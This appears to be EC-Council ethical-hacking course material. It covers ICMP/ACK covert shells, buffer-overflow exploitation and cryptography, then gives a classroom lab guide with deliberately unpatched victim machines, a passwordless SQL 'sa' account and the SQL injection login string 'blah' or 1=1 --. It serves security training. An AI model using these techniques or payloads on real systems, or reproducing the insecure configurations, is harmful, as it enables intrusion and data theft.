Hiding Behind Covert Channel: Loki
http://www.phrack.com/phrack/51/P51-06
~ LOKI2 is an information-tunneling program. LOKI uses
Internet Control Message Protocol (ICMP) echo
response packets to carry its payload. ICMP echo
response packets are normally received by the Ping
program, and many firewalls permit responses to pass.
~ We tunnel simple shell commands inside of
ICMP_ECHO /ICMP_ECHOREPLY and DNS name
lookup query / reply traffic. To the network protocol
analyzer, this traffic seems like ordinary benign packets
of the corresponding protocol. To correct listener ( the
LOKI2 daemon) however, the packets are recognized
for what they really are.
EC-Council
Hacking Tool: 007 Shell
http://www.s0ftpj.org/en/docs.html
~ 007Shell is a Covert Shell ICMP Tunneling
program. It works similar to Loki.
~ It works by putting data streams in the ICMP
message past the usual 4 bytes (8-bit type, 8-bit
code and 16-bit checksum).
EC-Council
Hacking Tool: ICMP Shell
~ ICMP Shell (ISH) is a telnet-like protocol. It
provides the capability of connecting a remote
host to open a shell using only ICMP for input
and output.
~ The ISH server runs as a daemon on the server
side. When the server receives a request from
the client, it will strip the header and look at the
ID field, if it matches the server's ID then it will
pipe the data to "/bin/sh".
~ It will then read the results from the pipe and
send them back to the client, where the client
then prints the data to stdout.
EC-Council
ACK Tunneling
~ Trojans normally use ordinary TCP or UDP
communication between their client and server parts.
~ Any firewall between the attacker and the victim that
blocks incoming traffic will usually stop all trojans from
working. ICMP tunneling has existed for quite some
time now, but if you block ICMP in the firewall, you will
be safe from that.
~ ACK Tunneling works through firewalls that do not
apply their rule sets on TCP ACK segments (ordinary
packet filters belong to this class of firewalls).
EC-Council
Hacking Tool: AckCmd
http://ntsecurity.nu/papers/acktunneling
• AckCmd is a client/server combination for Windows 2000 that lets
you open a remote command prompt to another system ( running
the server part of AckCmd.
• It communicates using only TCP ACK segments. This way the
client component is able to directly contact the server component
through firewall in some cases.
EC-Council
Honey pots
~ Honey pots are programs that simulate one or
more network services that you designate on
your computer's ports.
~ An attacker assumes that you are running
vulnerable services that can be used to break
into the machine.
~ A honey pot can be used to log access attempts
to those ports including the attacker's
keystrokes.
~ This could give advanced warnings of a more
concerted attack.
EC-Council
Honeypot Software Vendors
1. Back Officer Friendly (http://www.nfr.com)
2. Bait N Switch Honeypot (http://violating.us)
3. BigEye (http://violating.us)
4. HoneyD(http://www.citi.umich.edu/u/provos/honeyd/)
5. KFSensor for Windows (http://www.keyfocus.net/kfsensor/)
6. LaBrea Tarpit (http://www.hackbusters.net)
7. ManTrap (http://www.symantec.com)
8. NetFacade (http://www.itsecure.bbn.com/NetFacade.htm)
9. Single-Honeypot (http://www.sourceforge.net/projects/single-
honeypot/)
10. Smoke Detector
(http://palisadesys.com/products/smokedetector/)
11. Specter (http://www.specter.ch)
12. Tiny Honeypot (http://www.alpinista.org/thp/)
13. The Deception Toolkit (http://www.all.net/dtk/)
EC-Council
Honeypot-KFSensor
EC-Council
Summary
~ Intrusion Detection Systems (IDS) monitors packets on the network wire and
attempts to discover if a hacker/hacker is attempting to break into a system
~ System Integrity Verifiers (SIV) monitor system files to find when an intruder
changes. Tripwire is one of the popular SIVs.
~ Intrusion Detection happens either by Anomaly detection or Signature
recognition.
~ An IDS consists of a special TCP/IP stack that reassembles IP datagrams and
TCP streams.
~ A simple Protocol verification system can flag invalid packets. This can
include valid, by suspicious, behavior such as severally fragmented IP packets
~ In order to effectively detect intrusions that use invalid protocol behavior,
IDS must re- implement a wide variety of application-layer protocols to
detect suspicious or invalid behavior.
~ One of the easiest and most common ways for an attacker to slip by a firewall
is by installing network software on an internal system that usines a port
address permitted by the firewall's configuration.
~ Honey pots are programs that simulate one or more network services that
you designate on your computer's ports.
Ethical Hacking
Module XX
Buffer Overflows
EC-Council
Module Objective
~ What is a Buffer Overflow?
~ Exploitation
~ How to detect Buffer Overflows in a program?
~ Skills required
~ CPU / OS Dependency
~ Understanding Stacks
~ Stack Based Buffer Overflows
~ Technical details
~ Writing your own exploits
~ Defense against Buffer Overflows
EC-Council
On Oct 19 2000, hundreds of flights were grounded or delayed
because of a software problem in the Los Angeles air traffic
control system. The cause was attributed to Mexican Controller
typing 9 (instead of 5) characters of flight-description data,
resulting in a buffer overflow.
EC-Council
Buffer Overflows
~ A buffer overrun is when a program allocates a block of memory of a
certain length and then tries to stuff too much data into the buffer,
with extra overflowing and overwriting possibly critical information
crucial to the normal execution of the program. Consider the following
source code:
~ When the source is compiled and turned into a program and the
program is run, it will assign a block of memory 32 bytes long to hold
the name string.
Buffer overflow will occur if you enter:
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAA
EC-Council
Exploitation
~ Buffer overflow attacks depend on two things: the lack
of boundary testing and a machine that can execute
code that resides in the data/stack segment.
~ The lack of boundary is very common and usually the
program ends with segmentation fault or bus error. In
order to exploit buffer overflow to gain access or
escalate privileges, the offender must create the data to
be fed to the application.
~ Random data will generate a segmentation fault or bus
error, never a remote shell or the execution of a
command.
EC-Council
Stack based Buffer Overflow
~ Buffer is expecting a maximum number of guests.
~ Send the buffer more than x guests
~ If the system does not perform boundary checks, extra
guests continue to be placed at positions beyond the
legitimate locations within the buffer. (Java does not
permit you to run off the end of an array or string as C
and C++ do)
~ Malicious code can be pushed on the stack.
~ The overflow can overwrite the return pointer so flow of
control switches to the malicious code.
EC-Council
Knowledge required to Program Buffer
Overflow Exploits
1. C functions and the stack
2. A little knowledge of assembly/machine language.
3. How system calls are made ( at the level of machine
code level).
4. exec( ) system calls
5. How to 'guess' some key parameters.
EC-Council
Understanding Stacks
~ The stack is a (LIFO)
mechanism that
computers use both to
pass arguments to
functions and to
reference local variables.
~ It acts like a buffer,
holding all of the
information that the
function needs.
~ The stack is created at
the beginning of a
function and released at
the end of it.
EC-Council
Understanding Assembly Language
Two most important operations in a stack:
• 1. Push – put one item on the top of the stack
• 2. Pop - "remove" one item from the top of the stack
• typically returns the contents pointed to by a pointer and
changes the pointer (not the memory contents)
EC-Council
A Normal Stack
EC-Council
How to detect Buffer Overflows in a
program
There are two ways to detect buffer overflows.
• The first one is looking at the source code. In this
case, the hacker can look for strings declared as local
variables in functions or methods and verify the
presence of boundary checks. It is also necessary to
check for improper use of standard functions,
especially those related to strings and input/output.
• The second way is by feeding the application with
huge amounts of data and check for abnormal
behavior.
EC-Council
Attacking a real Program
~ Assuming that a string function is being exploited, the
attacker can send a long string as the input.
~ This string overflows the buffer and causes a
segmentation error.
~ The return pointer of the function is overwritten and
the attacker succeeds in altering the flow of execution.
~ If he has to insert his code in the input, he has to:
• Know the exact address on the stack
• Know the size of the stack
• Make the return pointer point to his code for execution
EC-Council
NOPS
~ Attacker pad the beginning of the
intended buffer overflow with a
long run of NOP instructions (a
NOP slide or sled) so the CPU will
do nothing till it gets to the 'main
event' (which preceded the 'return
pointer')
~ Most intrusion detection Systems
(IDS) look for signatures of NOP
sleds ADMutate (by K2) accepts a
buffer overflow exploit as input
and randomly creates a
functionally equivalent version
(polymorphism)
~ Most CPUs have a No
Operation instruction
- it does nothing but
advance instruction
pointer.
~ Usually we can put
some of these ahead
of our program (in
the string)
~ As long as the new
return address points
to a NOP we are OK
EC-Council
How to mutate a Buffer Overflow
Exploit
For the NOP portion
Randomly replace the NOPs with functionally
equivalent segments of code (e.g.: x++; x-; ? NOP NOP)
For the "main event"
Apply XOR to combine code with a random key
unintelligible to IDS and CPU code must also decode
the gibberish in time to run decoder is itself
polymorphic, so hard to spot
For the "return pointer"
Randomly tweak LSB of pointer to land in NOP-zone.
EC-Council
Once the stack is smashed..
Once vulnerable process is commandeered, the attacker
has the same privileges as the process can gain normal
access, then exploit a local buffer overflow vulnerability
to gain super-user access.
Create a backdoor
Using (UNIX-specific) inetd
Using Trivial FTP (TFTP) included with Windows 2000
and some UNIX flavors
Use Netcat to make raw, interactive connection
Shoot back an Xterminal connection
UNIX-specific GUI
EC-Council
Defense against Buffer Overflows
~ Manual auditing of
code
~ Disabling Stack
Execution
~ Safer C library
support
~ Compiler
Techniques
EC-Council
StackGuard
~ StackGuard: Protects Systems From Stack Smashing
Attacks
~ StackGuard is a compiler approach for defending
programs and systems against "stack smashing" attacks.
~ Programs that have been compiled with StackGuard are
largely immune to Stack smashing attack.
~ Protection requires no source code changes at all. when
a vulnerability is exploited, StackGuard detects the
attack in progress, raises an intrusion alert, and halts
the victim program.
http://www.cse.ogi.edu/DISC/projects/immunix/StackGuard/
EC-Council
Immunix System
~ Immunix System 7 is an Immunix-enabled RedHat
Linux 7.0 distribution and suite of application-level
security tools.
~ Immunix secures a Linux OS and applications
~ Immunix works by hardening existing software
components and platforms so that attempts to exploit
security vulnerabilities will fail safe. i.e. the
compromised process halts instead of giving control to
the attacker, and then is restarted.
http://immunix.org
EC-Council
Vulnerability Search - ICAT
EC-Council
Summary
~ A buffer overflow occurs when a program or process
tries to store more data in a buffer (temporary data
storage area) than it was intended to hold.
~ Buffer overflow attacks depend on two things: the lack
of boundary testing and a machine that can execute
code that resides in the data/stack segment.
~ Buffer Overflows vulnerability can be detected by
skilled auditing of the code as well as boundary testing.
~ Once the stack is smashed the attacker can deploy his
payload and take control of the attacked system.
~ Countermeasures include: checking the code, Disabling
Stack Execution, Safer C library support, using safer
Compiler Techniques.
~ Tools like stackguard, Immunix and vulnerability
scanners help securing systems.
Ethical Hacking
Module XXI
Cryptography
EC-Council
Module Objective
~ What is PKI
~ RSA
~ MD-5
~ SHA
~ SSL
~ PGP
~ SSH
~ Encryption Cracking Techniques
EC-Council
Public-key Cryptography
~ Public-key cryptography was invented in 1976 by
Whitfield Diffie and Martin Hellman.
~ In this system, each person gets a pair of keys, called
the public key and the private key.
~ Each person's public key is published while the private
key is kept secret.
~ Anyone can send a confidential message just using
public information, but it can only be decrypted with a
private key that is in the sole possession of the intended
recipient.
EC-Council
Working of Encryption
EC-Council
Digital Signature
EC-Council
RSA (Rivest Shamir Adleman)
~ RSA is a public-key cryptosystem developed by MIT
professors Ronald L Rivest, Adi Shamir, Leonard M
Adleman in 1977 in an effort to help ensure internet
security.
~ RSA uses modular arithmetic and elementary number
theory to do computation using two very large prime
numbers.
~ RSA encryption is widely used and is the 'de-facto'
encryption standard.
EC-Council
Example of RSA algorithm
EC-Council
RSA Attacks
~ Brute forcing RSA factoring
~ Esoteric attack
~ Chosen cipher text attack
~ Low encryption exponent attack
~ Error analysis
~ Other attacks
EC-Council
MD5
~ The MD5 algorithm takes as input a message of
arbitrary length and produces as output a 128-
bit "fingerprint" or "message digest" digest of
the input.
~ The MD5 algorithm is intended for digital
signature applications, where a large file must
be "compressed" in a secure manner before
being encrypted with a private (secret) key
under a public-key cryptosystem such as RSA.
EC-Council
SHA (Secure Hash Algorithm)
~ The SHA algorithm takes as input a message of
arbitrary length and produces as output a 160-
bit " fingerprint" or "message digest" of the
input.
~ The algorithm is slightly slower than MD5, but
the larger message digest makes it more secret
against brute-force collision and inversion
attacks.
EC-Council
SSL (Secure Socket Layer)
~ SSL stands for Secure Sockets Layer, SSL is a
protocol developed by Netscape for
transmitting private documents via the
Internet.
~ SSL works by using a private key to encrypt
data that is transferred over the SSL
connection.
~ SSL Protocol is application protocol
independent.
EC-Council
RC5
~ RC5 is a fast block cipher designed by RSA Security in
1994.
~ It is a parameterized algorithm with a variable block
size, a variable key size and a variable number of
rounds. The key size is 128 bit.
~ RC6 is a block cipher based on RC5. Like RC5, RC6 is a
parameterized algorithm where the block size, the key
size and the number of rounds are variable again. The
upper limit on the key size is 2040 bits.
EC-Council
What is SSH?
~ The program SSH (Secure Shell) is a secure
replacement for telnet and the Berkeley r-utilities
(rlogin, rsh, rcp and rdist).
~ It provides an encrypted channel for logging into
another computer over a network, executing commands
on a remote computer, and moving files from one
computer to another.
~ SSH provides a strong host-to host and user
authentication as well as secure encrypted
communications over an insecure internet.
~ SSH2 is a more secure, efficient and portable version of
SSH that includes SFTP, an SSH2 tunneled FTP.
EC-Council
Government Access to Keys (GAK)
~ Government Access to Keys ( also known as key escrow)
means that software companies will give copies of all
keys ( or at least enough of the key that the remainder
could be cracked very easily) to the government.
~ The government promises that they would hold the keys
in a secure way and only use them to crack keys when a
court issues a warrant to do so.
~ To the government, this issue is similar to the ability to
wiretap phones.
EC-Council
RSA Challenge
~ The RSA Factoring challenge is an effort, sponsored by
RSA Laboratories, to learn about the actual difficulty of
factoring large numbers of the type used in RSA keys.
~ A set of eight challenge numbers, ranging in size from
576 bits to 2048 bits are given.
EC-Council
distributed.net
www.distributed.net
~ An attempt to crack RC5 encryption using network of
computers world wide
~ The client utility when downloaded from distributed.net
runs the crack algorithm as screensaver and send
results to the distributed.net connected servers.
~ The challenge is still running...
EC-Council
PGP Pretty Good Privacy
~ Pretty Good Privacy (PGP) is a software package
originally developed by Philip R Zimmermann that
provides cryptographic routines for emails and file
storage applications.
~ Zimmermann took existing cryptosystems and
cryptographic protocols and developed a program that
can run on multiple platforms. It provides message
encryption, digital signatures, data compression and e-
mail compatibility.
EC-Council
Hacking Tool: PGP Crack
http://munitions.iglu.cjb.net/dolphin.cgi?action=render&
category=0406
~ PGP crack is a program designed to brute-force a
conventionally encrypted file with PGP or a PGP secret
key.
~ The file "pgpfile" must not be ascii-armored. The file
"phraselist“ should be a file containing all of the
passphrases that will be used to attempt to crack the
encrypted file.
EC-Council
Summary
~ Using Public Key Infrastructure (PKI), anyone can send a confidential
message using public information, which can only be decrypted with a
private key in the sole possession of the intended recipient.
~ RSA encryption is widely used and is a 'de-facto' encryption standard.
~ The MD5 algorithm is intended for digital signature applications,
where a large file must be compressed securely before being encrypted
~ SHA algorithm takes as input a message of arbitrary length and
produces as output a 160-bit message digest of the input.
~ Secure Sockets Layer, SSL is a protocol for transmitting private
documents via the Internet.
~ RC5 is a fast block cipher designed by RSA Security.
~ SSH (Secure Shell) is a secure replacement for telnet and the Berkeley
r-utilities and this provides an encrypted channel for logging into
another computer over a network, executing commands on a remote
computer, and moving files from one computer to another.
EC-Council
1
EC-Council
2
CEH LAB SETUP v3
Document overview
This document provides background information for technical staff responsible for setting up a training room facility for
the CEH course. This guide describes the requirements for the network equipment and computer stations that are
installed and configured by the facilities personnel for the training courses.
Training room environment
The training room environment consists primarily of the following equipment:
Equipment Number
(Class of 12 students)
Operating System Minimum
System Requirements
Student
Workstations
12 Windows 2000 Server w/o SP Pentium-based PC with 4 GB free
disk space, 128 MB RAM, 1 NIC
(disable or unplug extras), 15-
inch monitor and cards to drive
at 800 x 600 (or at monitor’s
native resolution) and configured
at 256 colors, and compatible
mouse
Instructor Station 1 Windows 2000 Server w/o SP Pentium-based PC with 10GB
free disk space, 128 MB RAM, 1
NIC (disable or unplug extras),
15-inch monitor and cards to
drive at 800 x 600 (or at
monitor’s native resolution) and
configured at 256 colors, and
EC-Council
3
compatible mouse, Wireless Card
Instructor Station 1 RedHat Linux 8 or 9 Pentium-based PC with 10GB
free disk space, 128 MB RAM, 1
NIC (disable or unplug extras),
15-inch monitor and cards to
drive at 800 x 600 (or at
monitor’s native resolution) and
configured at 256 colors, and
compatible mouse
Victim Machine 1 Windows 2000 Server w/o SP Pentium-based PC with 10GB
free disk space, 128 MB RAM, 1
NIC (disable or unplug extras),
15-inch monitor and cards to
drive at 800 x 600 (or at
monitor’s native resolution) and
configured at 256 colors, and
compatible mouse
Instructor’s computer
The instructor’s computer must:
ƒ Be installed with Windows 2000 Professional w/o SP
ƒ Be installed with SQL Server 2000 w/o SP
ƒ Be running Microsoft Internet Information Server (IIS)
ƒ Be running IP protocol. IPX is required if demonstrating NetWare hacking (optional)
ƒ Contain all hacking tools from the CD-ROM resident on the hard drive in c:tools
ƒ Contain all Windows 2000 source files in c:i386
EC-Council
4
ƒ Have PowerPoint, Word and Excel installed
ƒ Have Adobe Acrobat, WinZip installed
ƒ Install VMWare (Download evaluation registration key from VMWare website)
ƒ Have an Overhead Projector connected
ƒ Have a CD-ROM as part of its hardware
ƒ Set Windows Explorer to show all files and file types and extensions.
ƒ The use of Ghost images is recommended to reduce setup time if computer failure occurs. If using Ghost, the
Instructor’s computer should have an 8 GB hard drive that consists of a 4 GB FAT partition for NT and at least one
other partition on which to store images of the computers.
If using NetWare, 1 pc should also be running (optional):
ƒ Client 32 version 4.7+
ƒ NWAdmin
ƒ RConsole
ƒ NetWare administrator user ID = administrator, no password
Student workstations
Student workstations must:
ƒ Be installed with Windows 2000 Professional w/o SP
ƒ Be installed with IIS
ƒ Be running IP (IPX and NetBIOS compatible protocols required if using NetWare - optional)
ƒ Contain all hacking tools from the CD-ROM resident on the hard drive in c:tools
ƒ Contain all Windows 2000 source files in c:i386
ƒ Set Windows Explorer to show all files and file types.
ƒ Have Adobe Acrobat, WinZip installed
ƒ Install VMWare (Download evaluation registration key from VMWare website)
ƒ Install Matrix screen saver located in hacking CD-ROMMiscellaneous directory – set the time to 15 mins.
ƒ Download the CEH desktop wallpaper from http://www.eccouncil.org/classroom/background.jpg and set up the
downloaded image as Windows background wallpaper.
EC-Council
5
Victim workstation
Victim workstation must:
ƒ Be installed with Windows 2000 Professional w/o SP
ƒ Be installed with SQL Server 2000 w/o SP
ƒ Be installed with IIS
ƒ Be running IP (IPX and NetBios compatible protocols required if using
ƒ NetWare)
ƒ Contain all hacking tools from the CD-ROM resident on the hard drive in c:tools
ƒ Contain all Windows 2000 source files in c:i386
ƒ Set Windows Explorer to show all files and file types.
Room environment
ƒ The room must contain a whiteboard measuring a minimum of 1 yard by
ƒ 2-3 yards in length (1 ½ meter by 2-3 meters).
ƒ The room should contain an easel and large tablet.
ƒ The room must be equipped with legible black and blue felt tip pens (CHISEL-Point, not fine-tip).
Classroom configuration
The configuration of this classroom is modular. Computers can be added or removed by either row or column, depending
on the needs of the particular class. The following is a sample room setup that provides optimal support. This setup allows
for ease of access to "troublespots" by the instructor, and allows students to break into functional small and larger teams.
EC-Council
6
EC-Council
8
EC-Council
9
Set up the machines based on the classroom setup diagram. The lab exercises for the students are instructor led and they
are based on the hacking tools in the trainer slides. The instructor is encouraged to demonstrate and guide the students on
the usage of the hacking tools against the Victim’s computer. Do not encourage live hacking on the Internet using these
tools in the classroom. Please feel free to include your own exercises.
Instructor PC Requirements
Machine 1
Windows 2000 Server w/ SP0 or SP1
Microsoft SQL Server 2000
Optional: Wireless LAN Card
Optional: Wireless Access Points
Machine 2
RedHat Linux 7 or 8
Victim Machine Requirements
Windows 2000 Server (No service pack) default installation
Student Machine Requirements
Machine 1: Windows 2000 Server w/ SP0 or SP1
Machine 2: Optional: Machine with CD-ROM bootable Linux
EC-Council
12
Network topology
The training room must be physically isolated from any production network. Students must be able to access the Internet
from their PCs. All computers are connected as one isolated network and domain. The common protocol is IP. All
computers should have dynamic IP addresses using DHCP server. This reduces potential problems when booting from
Linux bootable CD-ROM. NICs can be 10Mbit or 100Mbit (100Mbit is recommended). Hub is recommended instead of a
switch (helpful in demonstrating Sniffer module) Cables must be bundled and tied out of pathways and work areas, and
of sufficient length as not to be under stress.
Instructor acceptance
Before the training class is scheduled to begin, the instructor will visit the training facility to inspect and accept the setup.
The technical contact (System Administrator) for the facility must be available to answer questions and correct any setup
issues. Both the instructor and the facility technical contact will ensure completion of the following checklists before the
training setup is deemed acceptable.
Checklists
Check the following on all PCs
Tick Here List
† Open Network Neighborhood. Verify that all classroom computers are visible in Network Neighborhood
† Verify that the Windows OS source files are on the computer in c:i386.
† Verify that the hacking tools are on the computer in c:tools.
† Verify that Internet access is available.
† Visit http://www.eccouncil.org and view the page to check Internet access.
† Open Command Prompt and type ping eccouncil.org and look for connection to the server.
† Verify Microsoft PowerPoint, Word, Excel are installed.
EC-Council
13
† Verify Acrobat and Winzip are installed.
† Verify that the Instructor computer can image through the overhead projector.
† Verify each computer has 2 GB or more free disk space.
† Verify Windows Explorer is set to show all files and file type including hidden files and extensions.
† Verify if you can successfully boot using CD-ROM bootable EC-Council Linux CD-ROM
† Cable Wiring organized and labeled
† Student Workstations and chair placement satisfactory
† Placement of LCD (overhead) projector appropriate
† Whiteboard and dry erase markers and eraser are available
† Instructor station properly organized and oriented
† Computers are labeled with client number.
† EC-Council courseware’s available for students.
† Write down the facility’s technical contact person’s hand phone number. Contact him in case of network
problem.
† Verify the configuration of CEH wallpaper on the desktop – black background with CEH logo at the center
† Test the “Matrix” screen saver.
EC-Council
10
Training Duration and Breakdown
Number of recommended days required for CEH training: 5 (9:00 – 5:00) class
Topics Breakdown:
Day 1
Ethics and Legal Issues
Footprinting
Scanning
Enumeration
Day 2
System Hacking
Trojans and Backdoors
Day 3
Sniffers
Denial of Service
Social Engineering
Session Hijacking
Day 4
Hacking Web Servers
Web Application Vulnerabilities
Web Based Password Cracking Techniques
SQL Injection
Hacking Wireless Networks
Day 5
Virus and Worms
Hacking Novell (Optional Module)
Hacking Linux
IDS, Firewalls and Honeypots, Buffer Overflows
Cryptography
EC-Council
14
Lab Exercises
Practice and understand how these tools work by reading the
documentation accompanying the tool.
Conduct the following module exercises in the classroom.
Install Command Prompt Here tool.
This shell extension adds a CMD Prompt Here command to the
context menu that is available when you right-click in the Folders
(left) pane of Windows Explorer. Selecting this option from the
context menu creates a new command-prompt session with the
same path as that of the object that is right-clicked.
Installing CmdHere
To install CmdHere:
1. In Windows Explorer, navigate to the <CD-
ROM>Miscellaneous
2. Right-click DOSHERE.INF.
3. On the resulting pop-up menu, click Install.
Now you can open any directory in command prompt. For example
to open <CD-ROM>System Hacking directory in Command
prompt, simply right-click the System Hacking directory and select
Command Prompt Here
EC-Council
15
Module 1: Legality
ƒ Ask the student to read the “Ethical Hacking Agreement.doc”
Module 2: Footprinting
ƒ Whois (Linux CD-ROM)
ƒ http://tucows.com
ƒ Hacking Tool: Sam Spade
ƒ NSLookup
ƒ ARIN
ƒ Traceroute
ƒ Hacking Tool: NeoTrace
ƒ Visual Route
ƒ Visual Lookout
ƒ Hacking Tool: Smart Whois
ƒ Hacking Tool: eMailTracking Pro
ƒ Hacking Tool: MailTracking.com
Module 3: Scanning
ƒ Hacking Tool: Netscan Tools Pro 2000
ƒ Hacking Tool: Hping2 (Linux CD-ROM)
ƒ Hacking Tool: netcraft.com
ƒ Hacking Tool: nmap (Linux CD-ROM)
ƒ Hacking Tool: HTTrack Web Copier
ƒ SolarWinds Toolset
ƒ NeoWatch
ƒ Hacking Tool: Cheops (Linux CD-ROM)
Module 4: Enumeration
ƒ NetBIOS Enumeration
ƒ Hacking Tool: DumpSec
ƒ Hacking Tool: NAT
ƒ Hacking Tool: User2SID
ƒ Hacking Tool: SID2User
ƒ Hacking Tool: Enum
ƒ Hacking Tool: UserInfo
ƒ Hacking Tool: GetAcct
Module 5: System Hacking
ƒ Legion
ƒ VisualLast
ƒ Hacking Tool: L0phtCrack
EC-Council
16
ƒ Hacking Tool: GetAdmin
ƒ Hacking Tool: Rootkit
ƒ MD5 Checksum utility
ƒ Auditpol
ƒ Hacking Tool: Elslave
ƒ Hacking Tool: Winzapper
ƒ Hacking Tool: Evidence Eliminator
ƒ NTFS File Streaming
ƒ Hacking Tool: Snow
ƒ Hacking Tool: Camera/Shy
Module 6: Trojans and Backdoors
ƒ Hacking Tool: Tini
ƒ Hacking Tool: Netcat
ƒ Hacking Tool: NetBus
ƒ Packaging Tool: Microsoft WordPad
ƒ Hacking Tool: Whack a Mole
ƒ fPort
ƒ TCPView
ƒ Process Viewer
Module 7: Sniffers
ƒ Hacking Tool: Ethereal (Linux CD-ROM)
ƒ Hacking Tool: Ettercap (Linux CD-ROM)
ƒ Hacking Tool: EtherPeek
ƒ Hacking Tool: ArpSpoof (Linux CD-ROM)
ƒ Hacking Tool: DSniff (Linux CD-ROM)
ƒ Hacking Tool: Macof (Linux CD-ROM)
ƒ Hacking Tool: mailsnarf (Linux CD-ROM)
ƒ Hacking Tool: URLsnarf (Linux CD-ROM)
ƒ Hacking Tool: Webspy (Linux CD-ROM)
ƒ Hacking Tool: WebMiTM (Linux CD-ROM)
ƒ Hacking Tool: Cain and Abel
ƒ Hacking Tool: Packet Crafter
ƒ Hacking Tool: WinSniffer
Module 8: Sniffers
ƒ Hacking Tool: Ping of Death
ƒ Hacking Tool: Freak88
Module 9: Social Engineering
ƒ Ask the student to read “Social Engineering-story.pdf”
ƒ Play the Kevin Mitnick Video
ƒ Demonstrate Hotmail Social Engineering
Module 10: Session Hijacking
ƒ Hacking Tool: T-Sight
ƒ Remote TCP Session Reset Utility
Module 11: Hacking Web Servers
ƒ Hacking Tool: Jill32
ƒ Hacking Tool: IIS5-Koei
ƒ Hacking Tool: IIS5Hack
ƒ Network Tool: LogAnalyzer
ƒ Hacking Tool: IISExploit
EC-Council
17
ƒ Hacking Tool: WB
ƒ UpdateExpert
ƒ Cacls utility
ƒ Network Tool: Whisker
ƒ N-Stealth Scanner
ƒ Hacking Tool: WebInspect
ƒ Network Tool: Shadow Security Scanner
Module 12: Web Application Vulnerabilities
ƒ Using Google to Inspect Applications
ƒ Hacking Tool: Instant Source
ƒ Hacking Tool: Jad
ƒ Hacking Tool: Lynx
ƒ Hacking Tool: Wget
ƒ Hacking Tool: Black Widow
ƒ Hacking Tool: WebSleuth
Module 13: Web Based Password Cracking
Techniques
ƒ Hacking Tool: WebCracker
ƒ Hacking Tool: Brutus
ƒ Hacking Tool: ObiWan
ƒ Hacking Tool: Munga Bunga
ƒ Hacking Tool: Varient
ƒ Hacking Tool: PassList
ƒ Hacking Tool: CookieSpy
ƒ Hacking Tool: SnadBoy
Module 14: SQL Injection (See How to setup the SQL
Demo scripts)
ƒ blah' or 1=1
ƒ Hacking Tool: SQLDict
ƒ Hacking Tool: SQLExec
ƒ Hacking Tool: SQLbf
ƒ Hacking Tool: SQLSmack
ƒ Hacking Tool: SQL2.exe
Module 15: Hacking Wireless Networks
ƒ Hacking Tool: NetTumbler
ƒ Hacking Tool: AirSnort
ƒ Hacking Tool: AiroPeek
ƒ Hacking Tool: WEP Cracker
ƒ Hacking Tool: Kismet
ƒ WIDZ- Wireless IDS
Module 16: Virus and Worms
ƒ How to write your own Virus?
Module 17: Novell Hacking
ƒ Novell Hacking is Optional
Module 18: Linux Hacking
ƒ HPing2 as Trojan
ƒ Hunt
ƒ Nessus
ƒ Advanced Nmap
EC-Council
18
ƒ Linux Rootkits
ƒ IPChains and IPTables
Module 19: IDS, Firewalls and Honeypots
ƒ SNORT
ƒ Hacking Tool: fragrouter
ƒ Hacking Tool: TCPReplay
ƒ Hacking Tool: SideStep
ƒ Hacking Tool: NIDSbench
ƒ Hacking Tool: ADMutate
ƒ Honeypot Trapserver
Module 20: Buffer Overflows
ƒ Writing your own Buffer Overflow Exploit in C
ƒ StackGuard
ƒ Immunix
Module 21: Cryptography
ƒ PGP
ƒ SSH
ƒ Encryption Cracking Techniques
How to setup the SQL Demo Scripts for SQL
Injection Module
1. The SQL Demo scripts are located in the directory
<CD-ROM>Module 14 – SQL InjectionSQL demo
scripts
2. Make you have SQL Server 2000 is installed.
3. The default user account/password for SQL Server
should be sa and no password
4. Create the Juggybank database. Execute the script
juggybank.sql script located in <data> directory using
SQL Query Analyzer
5. Setup a System DSN in control panel name it as
juggybank. The login.asp refers to this DSN for
accessing the database.
6. Populate the Userinfo table with data from juggybank-
userinfo-data.txt file manually or using the bcp import
utility.
7. Populate the CreditCard table with data from
juggybank-creditcard-data.txt file
8. Set SQL Server to Mixed Authentication mode using
SQL Server Enterprise Manager.
9. Publish the <CD-ROM>Module 14 – SQL
InjectionSQL demo scripts in IIS as virtual directory
called SQLInjection.
10. Ensure IUSR_COMPUTERNAME account has read
access to all the files in this virtual directory.
11. Configure SQLInjection virtual directory for directory
browsing in IIS.
EC-Council
19
12. Test the script by running the following in Internet
Explorer:
o http://localhost/sqlinjection/index.htm
o http://localhost/sqlinjection/client.htm
ƒ Login in as Username joker with
password joker
-or-
Login in as blah’ or 1=1 --
ƒ You should see bank’s Account
Summary page
o http://localhost/sqlinjection/client2.htm
ƒ This URL contains larger Login input
fields. You can try advanced SQL
injection techniques by using this page
like resetting IIS etc
o If you don’t see the bank page then it must be
permission problem. Check your settings again.
Assistance:
If you have problems or require assistance in setting up
the Lab for your CEH class, please e-mail
support@eccouncil.org

More Related Content

PDF
Making Continuous Security a Reality with OWASP’s AppSec Pipeline - Matt Tesa...
PDF
Introducción a Kali Linux
PPTX
102 Information security standards and specifications
PPTX
Application of TMMi to improve test approaches and processes: Experience from...
PPTX
CISSP - Security Assessment
PPTX
SQL INJECTION
PPT
Security testing
Making Continuous Security a Reality with OWASP’s AppSec Pipeline - Matt Tesa...
Introducción a Kali Linux
102 Information security standards and specifications
Application of TMMi to improve test approaches and processes: Experience from...
CISSP - Security Assessment
SQL INJECTION
Security testing

What's hot (20)

PPTX
VAPT - Vulnerability Assessment & Penetration Testing
PPT
The Future of Cyber Security
PPT
Web Application Security
PDF
The 15 ITIL Steps to DBaaS in the Cloud
PDF
Test Automation - Keytorc Approach
ODP
Computer virus
PPTX
WAF ASM / Advance WAF - Brute force lior rotkovitch f5 sirt v5 clean
DOCX
Requirement for creating a Penetration Testing Lab
PPTX
PPTX
WannaCry / Wannacrypt Ransomware
PPTX
Kali Linux
PPTX
Virtualization
PDF
Zero Trust And Best Practices for Securing Endpoint Apps on May 24th 2021
PPTX
PPT
Testing capability ppt
ODP
OWASP Secure Coding
PPTX
Burp suite
PPT
